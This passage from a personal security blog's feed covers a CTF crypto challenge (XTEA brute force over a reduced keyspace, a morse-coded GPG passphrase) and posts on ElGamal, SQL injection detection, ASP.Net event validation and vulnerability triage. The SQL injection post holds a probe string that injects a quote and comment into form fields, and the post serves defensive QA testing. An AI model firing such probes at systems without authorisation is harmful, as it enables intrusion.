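    """Invert xtea_encrypt by running the schedule backwards."""
    v0, v1 = block
    s = (DELTA * rounds) & MASK
    for _ in range(rounds):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + key[(s >> 11) & 3]))) & MASK
        s = (s - DELTA) & MASK
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + key[s & 3]))) & MASK
    return v0, v1

def brute_force(ciphertext, known_plaintext, key_bits=27):
    """Walk the reduced keyspace until a candidate key decrypts correctly."""
    for k in range(2 ** key_bits):
        if xtea_decrypt(ciphertext, (k, 0, 0, 0)) == known_plaintext:
            return k
    return None

# Round-trip sanity check with a key inside the reduced keyspace.
key = (0x5EC3E7, 0, 0, 0)
ct = xtea_encrypt((0xDEADBEEF, 0xCAFEBABE), key)
assert xtea_decrypt(ct, key) == (0xDEADBEEF, 0xCAFEBABE)
```

(2<sup>27</sup> candidates is small enough to walk in minutes in a compiled implementation; pure Python would be considerably slower.)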

<p>After you brute-forced all the blocks and matched up their corresponding filetypes from the code, you were left with a slew of images, an mp3, several textfiles, and two very promising files with the extensions .key.gpg and .txt.gpg.  Upon examining these files with gnupg, you found that .txt.gpg was an asymmetrically encrypted file with a key you did not possess; and .key.gpg was symmetrically encrypted with a passphrase you did not know.</p>

<p>You discovered that in the .key.gpg file - either through verbose gnupg output, looking at it in a hex-editor, or by running strings - there were a number of userid and marker packets at the end of the file. (The <a href="http://tools.ietf.org/html/rfc4880">OpenPGP file format</a> is a collection of different types of packets.)  These extra packets contained the strings "dot", "dash", or "PGP".  Dot and dash were morse code, PGP was the letter delimiter, and the sequence decoded to the word 'morse' - which was the passphrase to the file.</p>
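<p>Decoding that packet stream is a short exercise.  A sketch, assuming the tokens arrive in order - the morse table below covers only the letters this example needs:</p>

```python
# Partial morse table - just the letters needed for this example.
MORSE = {"--": "m", "---": "o", ".-.": "r", "...": "s", ".": "e"}

def decode(tokens):
    """tokens: 'dot'/'dash'/'PGP' strings; 'PGP' delimits letters."""
    letters, current = [], ""
    for t in list(tokens) + ["PGP"]:   # trailing delimiter flushes the last letter
        if t == "PGP":
            if current:
                letters.append(MORSE[current])
            current = ""
        else:
            current += "." if t == "dot" else "-"
    return "".join(letters)

tokens = (["dash", "dash", "PGP"] +            # m
          ["dash", "dash", "dash", "PGP"] +    # o
          ["dot", "dash", "dot", "PGP"] +      # r
          ["dot", "dot", "dot", "PGP"] +       # s
          ["dot"])                             # e
assert decode(tokens) == "morse"
```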

<p>Upon decryption, you had a .key file, which was the public and private key used to encrypt the second .txt.gpg file - but without any indicator of what the passphrase was.  Again, either through gnupg options, a hex-editor, or the 'strings' utility - you found that the preferred keyserver for the key was set to a particular URL.  When you visited it, you were given the passphrase, and the file decrypted to a text file containing the key for the CTF.</p>

<h3>Aftermath</h3>

<p>When the files were given to the teams, they also received a hint that the challenge would require brute forcing - Julian Cohen (one of the CTF organizers) and I argued back and forth for a while about whether that was acceptable, and how much time it should take.  I wanted the teams to only have enough time to run their program twice - while Julian felt it should be instant.  He argued they didn't have much time (the competition was 5 hours for a half-dozen challenges) while I argued they should understand the code and write it correctly the first time - I didn't want the challenge to become trial and error.  In the end, not only did they get a neutered keyspace (27 bits took me 5 minutes to run) but they also received the challenge the night before.  However, the hint threw off at least one team - they spent a long time finding hash collisions in the first 27 bits of the MD5 output.</p>

<p>In the end, this was the challenge solved by the most teams.  I don't know if it was because they spent more time on it than other challenges by receiving it early, because they could easily retrieve the code so the challenge was more accessible to them, or if it was just too darn easy.  I'll have to start brainstorming next year's challenge...  If you'd like to attempt the challenge yourself, you can <a href="/resources/ctf-challenge/hacktheplanet">download the multi-part file</a>.</p>

<h3>Bonus Trivia</h3>

<p>This challenge is extremely small - the multi-part file weighs in at only 220KB, despite containing many photos and a small snippet of an mp3.  While I had parts of the code from a project a year ago, the bulk of the challenge was actually written for a <a href="http://www.kickstarter.com/projects/fred/hackers-the-movie-15th-anniversary-party-on-oct-2n">Hackers-Themed party in Brooklyn</a> where I intended to distribute the challenge on 5 1/4" disks:<br /><br /><img src="/resources/ctf-challenge/hardware.jpg" alt="Straight Blingin" /></p>

<p>Unfortunately, both of my 5 1/4" drives not only didn't work, but blew out one of my motherboards.  I had to resort to 3 1/2" disks.  However, since only one of my friends I gave it to was even able to <em>find</em> a 3 1/2" drive, I decided to repurpose the challenge (adding the gpg elements, neutering the key) for the CTF.  Apparently I could have handed out blank 5 1/4" disks and no one would have known the difference.  As a final aside, in a fresh box of multi-colored 3 1/2" disks sitting on my shelf since the '90s, the green disks exhibited a much higher failure rate than the others: 7 dead green disks, 2 dead orange, 1 dead yellow, and 0 dead red or blue.</p>

<p>This writeup originally appeared on the <a href="http://blog.gdssecurity.com/labs/2010/11/18/hackers-puzzle-challenge-in-the-csaw-2010-ctf-final-round.html">Gotham Digital Science blog</a>.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-elgamal.html</guid>
		<title>an explanation of ElGamal Encryption</title>
		<pubDate>09 Nov 2010 17:15:34 EST</pubDate>
		<description><![CDATA[
<p>There's a million and one explanations of how RSA Encryption works, but significantly fewer on ElGamal - which is used more often these days (at least, based on the default key selection in gnupg).  I tried my hand at explaining it from near-first principles.  I don't expect you to know any group theory, so I cover that, but you should know what modulo and asymmetric cryptography are. <a href="security_adventures_elgamal.html" class="themainlink">Here's my attempt at explaining ElGamal</a>.  </p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-clickonce_mitm.html</guid>
		<title>ClickOnce MITM Attacks</title>
		<pubDate>21 July 2010 00:44:23 EST</pubDate>
		<description><![CDATA[
<p>I wrote a <a href="http://seclists.org/bugtraq/2010/Jul/164">bugtraq post</a> about the Microsoft ClickOnce Installer/Updater system, and how it's relatively easy to strip away code signing and man-in-the-middle an update and inject your malicious code.  <a class="themainlink" href="security_adventures_clickonce.html">Here's the writeup.</a></p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-sql_injection_detection.html</guid>
		<title>Detecting SQL Injection in a White-box Environment</title>
		<pubDate>07 June 2010 10:14:23 EST</pubDate>
		<description><![CDATA[
<p>The idea is simple.  You want to <a href="/security_poc_sqlinjectiontampering.html" class="themainlink">detect SQL Injection, when you have full access to the code and a QA team</a>.  You need to audit massively complex code that spans several servers and involves validation that may be happening on any of them, or the client in javascript.  You want to be able to bypass the javascript validation in whole - but not rewrite any javascript or do anything complicated - because you don't want to retrain any QA people - or even have to teach them what SQL Injection is.</p>

<p>The approach: put a proxy between the client and the web tier that rewrites requests into injections, and run a trace on the database to see if the injection ever makes it into a query.  It doesn't work in all cases, and sometimes there are better approaches - but it's another option, and it has a few advantages.  Check out the article for diagrams, code, and some enhancement ideas.</p>
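<p>The rewriting step might look something like the sketch below - a hypothetical illustration, not the article's code.  It assumes form parameters arrive as a simple dict, and the marker string is what you'd grep for in the database trace:</p>

```python
# Hypothetical probe: the leading quote is the actual injection attempt,
# the marker is just something distinctive to grep the DB trace for.
PROBE = "'--INJECTION_MARKER--"

def injection_variants(params):
    """Yield (tampered_field, mutated_params) - one mutated request per field."""
    for name in params:
        mutated = dict(params)
        mutated[name] = params[name] + PROBE
        yield name, mutated

# One original QA request fans out into one tampered request per parameter.
variants = dict(injection_variants({"user": "alice", "city": "NYC"}))
assert variants["user"]["user"] == "alice" + PROBE
assert variants["user"]["city"] == "NYC"   # other fields left alone
```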
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-why_event_validation_exists.html</guid>
		<title>why event validation exists in ASP.Net</title>
		<pubDate>01 May 2010 10:53:23 EST</pubDate>
		<description><![CDATA[
<p>The other day I had cause to trigger an event firing in ASP.Net without actually having the user trigger the event, so I went about figuring out how that worked.  It was simpler than I thought it would be, and it got me thinking about triggering events maliciously.  I put together a vulnerable sample project, went to trigger it, and ran smack into ASP.Net Event Validation - which exists to thwart this exact attack.  Disappointing.</p>

<p>But I remembered other cases where I had run into it, and I refreshed myself by reading K Scott Allen's <a href="http://odetocode.com/blogs/scott/archive/2006/03/20/asp-net-event-validation-and-invalid-callback-or-postback-argument.aspx">blog</a> <a href="http://odetocode.com/Blogs/scott/archive/2006/03/22/asp-net-event-validation-and-invalid-callback-or-postback-argument-again.aspx">posts</a> (first result on google too!).  Long story short, even though Event Validation exists, it may not always be turned on - because there are legitimate places where it makes life super annoying.</p>

<p>So <a href="/security_adventures_eventvalidation.html" class="themainlink">here's how to hack it</a> if Event Validation is turned off.  And a good reminder to developers why you should think twice before disabling it on a single page (or god forbid - site-wide).</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-finding_columns_in_user_defined_types.html</guid>
		<title>finding the columns in a user defined type in SQL Server and IISAPP in IIS 7</title>
		<pubDate>Apr 8 2010 16:00 EST</pubDate>
		<description><![CDATA[
<p>This took me way too long to figure out, so I'm blogging it.  If you want to find the columns in the user defined type you just defined and forgot about, here's what you do:</p>

<pre>
create type ImGoingToForgetThis as table (
	[id] int,
	[ie] int,
	[if] int
)
--Now close your query window...
exec [sys].sp_table_type_columns_100_rowset 'ImGoingToForgetThis'
</pre>

<p>Likewise, if you want to run the <a href="http://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/b8721f32-696b-4439-9140-7061933afa4b.mspx?mfr=true">iisapp.vbs</a> utility in IIS7 - it was replaced.  Instead drop this vbs script into %systemroot%/system32:</p>

<pre>
sub shell(cmd)
	dim objShell
	dim oExec
	dim output
	Set objShell = WScript.CreateObject( "WScript.Shell" )
	Set oExec = objShell.Exec(cmd)

	Do While Not oExec.StdOut.AtEndOfStream
		output = oExec.StdOut.Read(1000)
		WScript.Echo output
	Loop
end sub

shell "C:\Windows\system32\inetsrv\appcmd.exe list wp"
</pre>
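
<p>If you'd rather not touch VBScript, here's a rough Python equivalent of the same stream-the-output pattern (illustrative only - the appcmd path is the one from above):</p>

```python
import subprocess
import sys

def shell(cmd):
    """Run a command and echo its stdout as it streams in, like the vbs above."""
    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, text=True)
    for line in proc.stdout:
        sys.stdout.write(line)
    return proc.wait()

# On an IIS 7 box this would be:
# shell([r"C:\Windows\system32\inetsrv\appcmd.exe", "list", "wp"])
```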
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-comments_system.html</guid>
		<title>i have created comments</title>
		<pubDate>21 Feb 2010 20:11 EST</pubDate>
		<description><![CDATA[
<p>I have given you all the ability to comment on my blog. It's something that's been horrendously lacking for quite some time, and my only excuse is that there are so few people reading this it doesn't make much of a difference.  But now they are here and all 12 of my feed subscribers can come and comment.</p>

<p>It was actually more difficult than you'd expect, because I don't use any blog software - I write everything in HTML in emacs, and until the comments system, there was no database.  So integrating it was both an exercise in architectural integrity, and philosophy - I didn't want to let you comment until the comments behaved the way I wanted them to.  Mainly I wanted them to degrade gracefully, not slow down the page, and enable you to write a comment that was as thoughtful as a blog post, <em>and formatted to the same precision</em>.  The solution of course was *<a href="http://en.wikipedia.org/wiki/Markdown">markdown</a>* - which takes plain text like _this_ and changes it to <em>this</em>.</p>
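
<p>If you're curious what that transformation looks like, here's a toy sketch of just the emphasis rule in Python (an illustration only - the real comment system uses an actual markdown library):</p>

```python
import re

def tiny_markdown(text):
    """A toy markdown subset: *word* or _word_ becomes <em>word</em>."""
    text = re.sub(r"\*(.+?)\*", r"<em>\1</em>", text)
    text = re.sub(r"_(.+?)_", r"<em>\1</em>", text)
    return text

print(tiny_markdown("plain text like _this_"))
# → plain text like <em>this</em>
```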

<p>Oh, and since I rolled my own comment system, you'd be legitimately concerned about whether it was any good at escaping user input.  I'll freely admit that I had it pretty much done, then found that every single comment field (Name, Website, Comment, Email) could be exploited.  But I closed all that up.  And I believe a man is only as good as his word: <span style="font-weight: bold; font-size: large; color: red;">Exploit my comment system and I'll pay you $20.</span>  So go <a href="code_adventures_site.html#rev6">read my code</a> which I've graciously provided, and start fuzzing.  Here, <a href="http://ha.ckers.org/xss.html">this might help</a>.</p>

<p><strong>Update:</strong> Someone managed to break markdown, which in turn caused a javascript error in chrome.  So whoever that was, identify yourself and I'll buy you a cookie =)</p>

<p><strong>Second Update:</strong> My friend and general pythonista <a href="http://jmoiron.net/blog/">Jay Moiron</a> broke my json encoding, proving his point that I should have used simplejson from the beginning.  I relented, and fixed it.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-whos_your_survivor.html</guid>
		<title>Who's Your Survivor?</title>
		<pubDate>29 Jan 2010 07:36 EST</pubDate>
		<description><![CDATA[
<p>It's a well-popularized piece of trivia that during the State of the Union, one cabinet member stays behind and doesn't attend, just in case someone manages to kill the first 17 or so people in the line of succession.  2 days ago (Jan 27, 2010), Shaun Donovan (Secretary of Housing and Urban Development) was the <a href="http://en.wikipedia.org/wiki/Designated_survivor">designated survivor</a>.  As an aside - he wouldn't actually have been sworn in, as Secretary of State Hillary Clinton was in London and hence would have <a href="http://en.wikipedia.org/wiki/United_States_presidential_line_of_succession">succeeded</a>.  (One must wonder about the logistics of who gets to have a <a href="http://en.wikipedia.org/wiki/Nuclear_football">nuclear football</a> in times like those.)</p>

<p>Anyway, several years ago I interned at <a href="http://www.barenecessities.com/">Bare Necessities</a> (semi-NSFW) where I absorbed a wealth of information about female undergarments that seems out-of-context and creepy today.  But besides learning the difference between a G-String and a Thong, I learned something about Operations Management.  Apparently one day, the entire tech team (5-6 people) went out for a sit-down lunch, and when they got back the site was down and had been for about an hour.  After that, there was a semi-joke, semi-serious rule that the entire tech team could not go out to lunch together.</p>

<p><a href="http://blog.reddit.com/2010/01/what-day.html">Reddit learned that lesson yesterday</a>.  To summarize the post, 3/4 of their tech team was at Google interviewing Peter Norvig, and the other 1/4 was in NYC going to meetings.  The site suffered an ad attack followed by an outage - and the best they could do was huddle in Google's lobby working on laptops to fix it.</p>

<p>At my current job, there are around 2 dozen people who have access to production, split amongst Database Guys, Development, and Infrastructure.  We have on-call lists, with priorities running down, and automated alerts - we're pretty good about it.  But then I realized - what's the one event, that <em>usually</em> (not always, but usually) manages to incapacitate &gt;85% of the <em>entire</em> tech team?  That's right - Company Party.  It's never come up, to my knowledge, but the thought of my bosses, slightly-to-very intoxicated, huddled around the single guy who brought his laptop to the party - all wanting to just rip it out of his hands and do it themselves - well, it amuses me.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-architecture_of_buenos_aires.html</guid>
		<title>Architecture of Buenos Aires</title>
		<pubDate>27 Jan 2010 04:36 EST</pubDate>
		<description><![CDATA[
<p>Before I decided to major in Computer Science, I looked at schools for Architecture.  And while I obviously never majored in it, I still am drawn to it.  I eventually ran across a blog called <a href="http://www.scoutingny.com/">Scouting NY</a> a year or so ago, and it instantly became one of the feeds I would look forward to in my <a href="http://ritter.vg/readinglist.html">feed reader</a>.  The Scout's job is to scout locations for films, and in doing so he blogs about some of the interesting things you can see in NYC if you actually pay attention.  He's shown me some amazing sights in New York - and even better he's taught me to <em>open my own eyes</em> and find them for myself.  I thought I would pay him some homage and show three buildings that have struck me while I'm staying in Buenos Aires.</p>

<hr>

<p>
<a href="/resources/ba-arch/Belgrano 1.jpg"><img src="/resources/ba-arch/tn_Belgrano 1.jpg" style="float:left;margin:5px;"></a>
<a href="/resources/ba-arch/Belgrano 3.jpg"><img src="/resources/ba-arch/tn_Belgrano 3.jpg" style="float:right;margin:5px;"></a>
<a href="/resources/ba-arch/Belgrano 2.jpg"><img src="/resources/ba-arch/tn_Belgrano 2.jpg" style="float:right;margin:5px;"></a>
Firstly, I have this building - which I know nothing about.  It's on Belgrano a few streets south of Plaza de Mayo - and as far as I know it's just an apartment building.  But compare it to the buildings next to it - it's clearly an order of magnitude more impressive.  Take a look at the facade - the tiny faux-balconies, the columns running down it, and the bay windows at the corner. </p>

<p style="clear:both">
<a href="/resources/ba-arch/Belgrano 4.jpg"><img src="/resources/ba-arch/tn_Belgrano 4.jpg" style="float:left;margin:5px;"></a>
<a href="/resources/ba-arch/Belgrano 5.jpg"><img src="/resources/ba-arch/tn_Belgrano 5.jpg" style="float:left;margin:5px;"></a>
<a href="/resources/ba-arch/Belgrano 6.jpg"><img src="/resources/ba-arch/tn_Belgrano 6.jpg" style="float:right;margin:5px;"></a>
And then there are two incredible sets of ornamentation.  First are the statues.  In Buenos Aires they're referred to as Las Caras - literally The Faces.  Each seems to be supporting the weight of the building on his shoulders, and each is slightly different - one is holding a pickaxe, another a chain.</p>

<p style="clear:both">
<a href="/resources/ba-arch/Belgrano 7.jpg"><img src="/resources/ba-arch/tn_Belgrano 7.jpg" style="float:left;margin:5px;"></a>
<a href="/resources/ba-arch/Belgrano 8.jpg"><img src="/resources/ba-arch/tn_Belgrano 8.jpg" style="float:left;margin:5px;"></a>
<a href="/resources/ba-arch/Belgrano 9.jpg"><img src="/resources/ba-arch/tn_Belgrano 9.jpg" style="float:right;margin:5px;"></a>
The other piece of ornamentation is the eagles near the top of the building.  Above the eagles, there is what appears to be a private balcony - and above that are the towers.  It looks like one of the spires has a crown on top and the other a weathervane.  The bottom of the building is shop or restaurant space that is for sale.</p>

<p style="clear:both;text-align:center;">
<a href="/resources/ba-arch/Belgrano 10.jpg"><img src="/resources/ba-arch/tn_Belgrano 10.jpg" style=";margin:5px;"></a>
<a href="/resources/ba-arch/Belgrano 11.jpg"><img src="/resources/ba-arch/tn_Belgrano 11.jpg" style=";margin:5px;"></a>
<a href="/resources/ba-arch/Belgrano 12.jpg"><img src="/resources/ba-arch/tn_Belgrano 12.jpg" style=";margin:5px;"></a>
</p>

<hr style="clear:both">

<p style="clear:both">
<a href="/resources/ba-arch/hipotecario1.jpg"><img src="/resources/ba-arch/tn_hipotecario1.jpg" style="float:left;margin:5px;"></a>
<a href="/resources/ba-arch/hipotecario2.jpg"><img src="/resources/ba-arch/tn_hipotecario2.jpg" style="float:right;margin:5px;"></a>
The next building is about as opposite as you can get - but I still love it.  It's an all-concrete structure built in the 60s or 70s.  It's located in the banking district - near Buenos Aires' Wall Street equivalent, with narrow streets that make it impossible to get a good shot of the entire building from the street.  As we move down towards the front door you can see the structure of the building opening up into a sunk-back front door - complete with an amazing meeting room above the street.</p>

<p style="clear:both;text-align:center;">
<a href="/resources/ba-arch/hipotecario3.jpg"><img src="/resources/ba-arch/tn_hipotecario3.jpg" style=";margin:5px;"></a>
<a href="/resources/ba-arch/hipotecario4.jpg"><img src="/resources/ba-arch/tn_hipotecario4.jpg" style=";margin:5px;"></a>
<a href="/resources/ba-arch/hipotecario5.jpg"><img src="/resources/ba-arch/tn_hipotecario5.jpg" style=";margin:5px;"></a>
<a href="/resources/ba-arch/hipotecario6.jpg"><img src="/resources/ba-arch/tn_hipotecario6.jpg" style=";margin:5px;"></a>
<a href="/resources/ba-arch/hipotecario7.jpg"><img src="/resources/ba-arch/tn_hipotecario7.jpg" style=";margin:5px;"></a>
<a href="/resources/ba-arch/hipotecario8.jpg"><img src="/resources/ba-arch/tn_hipotecario8.jpg" style=";margin:5px;"></a>
</p>


<hr style="clear:both">

<p style="clear:both">The last building is the most beautiful building I think I have ever seen.  I'll give you the glamour shot and just get it over with.</p>

<p style="clear:both;text-align:center;"><a href="/resources/ba-arch/uba 1.jpg"><img src="/resources/ba-arch/tn_uba 1.jpg" style=";margin:5px;"></a></p>

<p style="clear:both">
<a href="/resources/ba-arch/uba 2.jpg"><img src="/resources/ba-arch/tn_uba 2.jpg" style="float:left;margin:5px;"></a>
<a href="/resources/ba-arch/uba 3.jpg"><img src="/resources/ba-arch/tn_uba 3.jpg" style="float:right;margin:5px;"></a>
This is one of three buildings for the School of Engineering at UBA (University of Buenos Aires).  Construction on the building began in 1912, and it has an entry <a href="http://es.wikipedia.org/wiki/Facultad_de_Ingenier%C3%ADa_(UBA)#Las_Heras">on the Spanish Wikipedia</a>.  The architect was a man named Arturo Prins, and <a href="http://www.lanacion.com.ar/nota.asp?nota_id=480900">there's some intrigue as to his death</a> - my Spanish is not that great, and google translate does its best but isn't perfect - the rumor is that he committed suicide because he wasn't able to complete the building due to funding and construction miscalculations.  In fact, I'm unable to determine the provenance <a href="http://www.acceder.buenosaires.gov.ar/es/879741">of this photo</a> but if you were to take it at face value - the building is only half as tall as it should be!</p>

<p style="clear:both">
<a href="/resources/ba-arch/uba 4.jpg"><img src="/resources/ba-arch/tn_uba 4.jpg" style="float:left;margin:5px;"></a>
<a href="/resources/ba-arch/uba 5.jpg"><img src="/resources/ba-arch/tn_uba 5.jpg" style="float:right;margin:5px;"></a>
As you move around the building, the most striking feature to me is the dual balconies.  (I'm actually not entirely sure they <em>are</em> balconies - they may be inaccessible except for climbing through windows - but I would find that difficult to believe.)  The first balcony is immense - large enough for a snazzy cocktail party overlooking the street.  It reminds me of Gaud&iacute;'s immense <a href="http://img6.travelblog.org/Photos/55959/261964/t/2158975-park-guell-0.jpg">plaza above a plaza in Park G&uuml;ell</a> in Barcelona.  Above <em>that</em> is a smaller balcony that reminds me of the elite of the elite looking down on their subjects.  (Okay, actually, it reminds me of the balcony scene in the <a href="http://www.pixelmagicfx.com/features/spiderman/images/spideyvfx3_0001.jpg">first Spider-Man</a>.)</p>

<p style="clear:both">
<a href="/resources/ba-arch/uba 6.jpg"><img src="/resources/ba-arch/tn_uba 6.jpg" style="float:left;margin:5px;"></a>
<a href="/resources/ba-arch/uba 7.jpg"><img src="/resources/ba-arch/tn_uba 7.jpg" style="float:right;margin:5px;"></a>
<a href="/resources/ba-arch/uba 8.jpg"><img src="/resources/ba-arch/tn_uba 8.jpg" style="float:right;margin:5px;"></a>
Slide around the corner, and you see another balcony running along the side of the building.  If there was ever a place to hold a fancy reception on a Spring Evening - this would surely be it.  Looking at it from the back, we can see that it is rather massive.  However, it has also acquiesced to time.  A giant tower projects out of it, and it is in poor repair.  Grass grows out of its roof, the entire thing needs to be repointed to repair the brickwork (and having looked into that for a building <em>much</em> smaller - I can tell you that's a >$10m project), and I'm not sure why but there are support beams protruding from some corners and areas.  There seems to be a large family of cats living in its backyard also.</p>

<p style="clear:both;text-align:center">
<a href="/resources/ba-arch/uba 10.jpg"><img src="/resources/ba-arch/tn_uba 10.jpg" style=";margin:5px;"></a>
<a href="/resources/ba-arch/uba 11.jpg"><img src="/resources/ba-arch/tn_uba 11.jpg" style=";margin:5px;"></a>
<a href="/resources/ba-arch/uba 12.jpg"><img src="/resources/ba-arch/tn_uba 12.jpg" style=";margin:5px;"></a>
<a href="/resources/ba-arch/uba 13.jpg"><img src="/resources/ba-arch/tn_uba 13.jpg" style=";margin:5px;"></a>
</p>

<p style="clear:both">I don't know what will happen to this building - The Engineering School has two other, much newer and much larger buildings.  This particular building is in a very nice area of town, with a lot of shops and even more apartment buildings, next to a park, on a major street.  Taken all together... it wouldn't look good.  I don't know if it's protected by any laws, if it's being repaired, or any rumors regarding its fate.  But I sincerely hope it gets repaired, and in a manner that preserves the look of it (specifically the brick coloring).  In closing, I'll leave you with my favorite place to be in all of Buenos Aires.</p>

<p style="clear:both;text-align:center">
<a href="/resources/ba-arch/uba 14.jpg"><img src="/resources/ba-arch/tn_uba 14.jpg" style=";margin:5px;"></a>
</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-simple_crypto_pack.html</guid>
		<title>simple crypto pack</title>
		<pubDate>17 Jan 2010 20:43:00 EST</pubDate>
		<description><![CDATA[
<p>Every so often I run into some simple (or not-so-simple) cipher and I'm curious what it means.  And every time I end up writing the same PHP scripts to shift all the letters and try various vigenere keys.  I figured I might as well just write them well once and be done with it.  ("Well" is, of course, relative.)  They're not all that sophisticated, and they're not designed to be "fire-and-forget" - they require you to do some analysis yourself and find what fits.  But maybe they'll help you with the newspaper cryptogram.</p>
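
<p>As a flavor of what the scripts do, here's the simplest one reduced to a Python sketch (not the pack itself - that's on github): print every Caesar shift and let a human spot the English.</p>

```python
def caesar_shifts(ciphertext):
    """Return all 26 shifts of a ciphertext; you eyeball the readable one."""
    results = []
    for shift in range(26):
        shifted = []
        for ch in ciphertext:
            if ch.isalpha():
                # Shift within the alphabet, preserving case and punctuation.
                base = ord('A') if ch.isupper() else ord('a')
                shifted.append(chr((ord(ch) - base + shift) % 26 + base))
            else:
                shifted.append(ch)
        results.append(''.join(shifted))
    return results

print(caesar_shifts("ebiil")[3])
# → hello
```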

<p>The code is available on <a href="http://github.com/tomrittervg/simple-crypto-pack" class="themainlink">github</a>.</p>

<p>Also, to my 12 rss readers, who were inundated by a complete push of all my old articles - I apologize.  I redid the guids for the posts, when I <a href="http://ritter.vg/code_adventures_site.html">rewrote my site</a> this weekend (yes, again), so they were pushed to you as duplicates.</p>
]]></description>
	</item>

	<item>
		<guid>http://ritter.vg/blog-bruce_schneier_is_wrong.html</guid>
		<title>bruce schneier is wrong</title>
		<pubDate>28 Dec 2009 21:45:23 EST</pubDate>
		<description><![CDATA[
<p>Bruce Schneier is wrong.  There, I said it.  Specifically, he's wrong in one of his recent essays <a href="http://www.schneier.com/blog/archives/2009/12/reacting_to_sec.html">Reacting to Security Vulnerabilities</a>, and he's wrong in the suggestions he makes.  </p>

<p>He states there are several reasons to "do nothing. ... Don't panic. Don't change your behavior. Ignore the problem, and let the vendors figure it out." They are:</p>

<ol>
  <li>It's hard to figure out which vulnerabilities are serious and which are not. ... The press either mentions them or not, somewhat randomly; just because it's in the news doesn't mean it's serious.</li>
  <li>It's hard to figure out if there's anything you can do. ... Some vulnerabilities have surprising consequences. The SSL vulnerability mentioned above could be used to hack Twitter. </li>
  <li>The odds of a particular vulnerability affecting you are small. There are a lot of fish in the Internet, and you're just one of billions.</li>
  <li>Often you can't do anything. These vulnerabilities affect clients and servers, individuals and corporations. A lot of your data isn't under your direct control -- it's ... in a cloud computing application.</li>
</ol>

<p>He then gives a list of steps you should take to protect yourself client-side: anti-virus, updates, proper configuration, common sense, and backups.  Those steps aren't wrong - they're all true.  But his conclusion to ignore vulnerability reports is downright careless.  </p>

<p>For the elements (servers, people, services, etc) within your sphere of influence - you should be keeping an eye on the vulnerabilities that can affect them.</p>

<p>Consider a <a href="http://secunia.com/advisories/37831/">recent flaw found in IIS</a>.  If you're vulnerable, it's a pretty serious hole you have open - <a href="http://blog.metasploit.com/2009/12/exploiting-microsoft-iis-with.html">lots of bad things can happen</a>.  Fortunately, three things are on your side, two of which Bruce stated: the odds of you meeting the criteria are small and if it does affect you the odds of someone finding and exploiting you are small.  Furthermore, good to excellent sysadmins would already be protected from this (it's a subtle/tricky thing to protect against but still oft-advised.)</p>

<p>But none of these things matter after you get hacked.  Then it's your data on the internet, it's your ass on the line, and it's you that I want to punch in the face after you leak my credit card.  You can't claim "I was waiting for the vendor" - Microsoft isn't going to apologize and make everyone's credit cards come back home.  You can't stand in front of the CEO and say "The odds of this happening were so low we didn't think it was worth protecting against."  </p>

<p>The fact of the matter is the tradeoff of reviewing vulnerabilities and at the very least <em>being aware of what you're vulnerable to</em> is low-cost/high-reward. Let's take a look at the cost: Add a <a href="http://gentoo-portage.com/RSS/GLSA">few</a> <a href="http://www.securityfocus.com/archive/1"><strong>firehoses</strong></a> <a href="http://trac.wordpress.org/query?status=new&status=assigned&status=reopened&groupdesc=1&group=priority&format=rss&component=Security&order=priority">of</a> <a href="http://nvd.nist.gov/download/nvd-rss-analyzed.xml">information</a> into google reader and skim through them in 5 minutes a day while having your coffee.  </p>

<ul>
  <li>Do I use the app/protocol that's vulnerable? That knocks out about 95% of the reports.</li>
  
  <li>Is it a client app? VLC? Windows Media Player? Don't care.  These are all relegated to either social engineering exploits (Click this link! Watch this video!) or fall into the category of things you can't fix (besides trying to bar people from using the app)</li>
  
  <li>Is it a public-facing service/protocol/app I care about?  Go read the damn vulnerability.  You're probably at about 5-10 of these a week by now - tops.  </li>
  
  <li>Is it fixed in a new version?  Do I use the new version? Since you're hopefully staying on top of updates this will probably knock out a third of them.</li>
  
  <li>How do you exploit it?  E.g.: If it involves uploading a file - do you allow file uploads anywhere? No? Awesome, you're safe! You don't know? Then... how are you managing the server if you don't know what it does?  (Seems like you ought to work with your colleagues a little closer.)  Or let's say the way to exploit it is really complicated or not explicitly stated, like the HTTPS vulnerability.  Well, the fix for it will either be easy with little to no consequences (like disabling HTTPS renegotiation or adding 17 characters in a php file to protect against a Wordpress vulnerability) - so bloody do it and don't worry about it - or it will not be so easy.</li>
  
  <li>Okay, so it seems to be vulnerable and the fix isn't that easy.  This probably comes around like once every 3 months.  Send out an email "I think hackers can X our Y" - that'll be sure to either A) get people to respond that you're wrong and you're safe, or B) establish that this is serious, and you're now given the resources to get it investigated and fixed.  <em>No one</em> wants to be the guy who says "Yea, I heard we might be vulnerable, but I asked him not to investigate it."</li>
</ul>
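
<p>If you wanted to automate the very first filter in that list - "do I even run this thing?" - it's nearly a one-liner against your feed titles.  (A sketch with a made-up stack, obviously not a real triage tool:)</p>

```python
# Hypothetical stack - substitute whatever you actually run in production.
MY_STACK = {"iis", "wordpress", "openssl"}

def triage(advisory_titles):
    """Keep only the advisories that mention something in my stack."""
    return [title for title in advisory_titles
            if any(product in title.lower() for product in MY_STACK)]

print(triage(["Critical IIS 5/6 flaw", "VLC buffer overflow"]))
# → ['Critical IIS 5/6 flaw']
```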

<p>At this point, you're probably spending an hour a week doing this.  And let me tell you - there is nothing more impressive to your boss than when he comes to you to ask about something he saw in the paper or in his feedreader and you can say "Yea, I looked at that vulnerability already and [we're not vulnerable/I closed the hole]." </p>

<p>I didn't pull these numbers out of thin air - I manage a half-dozen web apps and a few servers in either a semi-professional or professional capacity.  If you're spending significantly more time you're probably doing it in a capacity where it's a formal part of your job in which case there's nothing to complain about.  Bruce Schneier is wrong - it's our responsibility to stay on top of vulnerabilities and mitigate them when we can to protect our computers, businesses, and our clients' data.</p>

